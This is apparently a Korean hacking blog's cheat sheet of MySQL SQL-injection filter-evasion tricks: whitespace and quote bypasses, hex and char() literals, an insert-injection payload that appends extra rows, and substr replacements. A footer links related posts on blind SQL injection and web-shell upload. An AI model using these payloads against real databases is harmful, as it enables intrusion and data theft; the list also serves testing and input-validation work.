mysql 우회 기법 정리
2014. 2. 5. 02:12
# 공백 우회
- /**/
- %09, %0d, %0a
- select`id`from`user`
# ' 우회
- concat(char(49),char(50)) = '12'
- char(0x31,0x32,0x33) = '123'
- 0x41424344 = 'abcd'
- x'41424344' = 'abcd'
- true + true =2
- where '1'=0 / False Injection, 1=1 과 동일함
# 함수 정리
unix_timestamp() -> '135461123'
inet_ntoa(2108797737) -> '125.177.179.41'
# insert injection
"a1','a2','a3'), ('b1','b2','b3'), ('c1"
insert into test values ('a','b','c')
=
insert into test select 'a','b','c'
# 키워드 우회
substr('abc',1,1) == right(left('abc',1),1)
substr('abc',2,1) == right(left('abc',2),1)
등...(정리중)
'Web Hacking' 카테고리의 다른 글
| lpad , conv 를 이용한 BlindSQL Injection (1) | 2014.02.11 |
|---|---|
| .htaccess 를 활용한 웹쉘 업로드 및 기타 공격 (0) | 2014.02.09 |
| SQL Injection(MySQL) - procedure analyze() (2) | 2014.02.04 |
| magic_qoutes_gpc() 우회 / getenv() 로 값을 가져올때의 SQL Injection (0) | 2014.02.03 |
| md5 를 raw_input 으로 비교할 시 취약점 (0) | 2014.02.01 |